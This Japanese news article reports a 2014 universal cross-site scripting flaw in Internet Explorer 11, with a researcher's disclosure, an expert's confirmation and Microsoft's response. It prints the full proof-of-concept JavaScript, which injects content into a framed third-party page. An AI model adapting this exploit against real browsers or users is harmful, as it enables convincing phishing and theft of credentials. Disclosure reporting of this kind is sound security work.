クリティカルなInternet Explorer 11の脆弱性がユーザーの資格情報を盗むために使用される可能性

Table Of Contents

• セキュリティ研究者がWindows 7および8.1上のInternet Explorer 11に影響を与えるクリティカルなユニバーサルクロスサイトスクリプティング（XSS）欠陥を発見
• 脆弱性

セキュリティ研究者がWindows 7および8.1上のInternet Explorer 11に影響を与えるクリティカルなユニバーサルクロスサイトスクリプティング（XSS）欠陥を発見

セキュリティ研究者のデビッド・レオは、Windows 7および8.1上のInternet Explorer 11に影響を与えるユニバーサルクロスサイトスクリプティング（XSS）欠陥を発見しました。この欠陥により、潜在的なハッカーがIEユーザーに対して非常に説得力のあるフィッシング攻撃を実行することが可能になります。

レオは、彼の発見をFull Disclosureメーリングリストに提出しました。こちらで見つけることができます。彼は、2014年10月13日にマイクロソフトにこの問題を報告したが、現在までにマイクロソフトはこの脆弱性を修正していないと述べました。

脆弱性

この脆弱性はユニバーサルクロスサイトスクリプティング（XSS）欠陥として知られています。XSSの欠陥は、攻撃者が同一オリジンポリシー（SOP）を回避するために悪用することができます。SOPは、インターネットユーザーにとって重要なポリシーであり、1つのブラウザタブが他のタブの情報にアクセスしたり、他のサイトによって設定されたブラウザクッキーやその他のコンテンツを変更したりすることを許可しません。

レオは、XSSの欠陥の証明概念を示すウェブサイトを作成しました。こちらからアクセスできます。このウェブサイトは、レオが書いたメッセージをポップアップ表示することができ、脆弱性の重大性を示しています。

潜在的な攻撃者は、この脆弱性を利用して、最新のパッチが適用されたサポートされているバージョンのInternet Explorerを使用しているユーザーを悪意のあるページに誘導することができます。

レオのPoCを使用すると、ハッカーはブラウザのアドレスバーに表示されるURLがユーザーが訪問しようとしているものと同じままである間に、ユーザーに潜在的に悪意のあるコンテンツを表示することができます。この欠陥の悪意のある可能性は、Tumblrのセキュリティエンジニアであるジョーイ・ファウラーによって確認され、彼はレオに次のように書きました。

こんにちはデビッド、「素晴らしい」というのは控えめな表現です。私はこれでいくつかのテストを行いましたが、いくつかの奇妙な点はあるものの、確実に機能します。標準のHTTPからHTTPSへの制限も回避します。フレーム内のページがX-Frame-Optionsヘッダー（denyまたはsame-originの値を持つ）を含まない限り、正常に実行されます。ペイロードが注入される限り、ほとんどのコンテンツセキュリティポリシーも回避されます（つまり、JavaScriptの代わりにHTMLを注入することによって）。この方法を通じて、すべての実行可能なXSS戦術が開かれているようです！素晴らしい発見です！このスレッドの外（または内）でマイクロソフトに報告されましたか？ — ジョーイ・ファウラー Tumblrのシニアセキュリティエンジニア

エクスプロイトコードは次のようになります

function go() {
w=window.frames[0];
w.setTimeout(“alert(eval(‘x=top.frames[1];r=confirm(\’このウィンドウを3秒後に閉じますか…\’);x.location=\’javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\’;’))”,1);
}
setTimeout(“go()”,1000);

マイクロソフトは、この欠陥のパッチに取り組んでいると述べながら、この欠陥が実際に悪用されていることは知られていないと述べました。

「これを悪用するには、まず敵がユーザーを悪意のあるウェブサイトに誘導する必要があります。これはしばしばフィッシングを通じて行われます。新しいバージョンのInternet ExplorerではデフォルトでオンになっているSmartScreenは、フィッシングウェブサイトから保護するのに役立ちます。」と彼は言いました。「私たちは引き続き、顧客に信頼できないソースからのリンクを開かないことや、信頼できないサイトを訪問しないこと、そして情報を保護するためにサイトを離れる際にはログアウトすることを推奨しています。」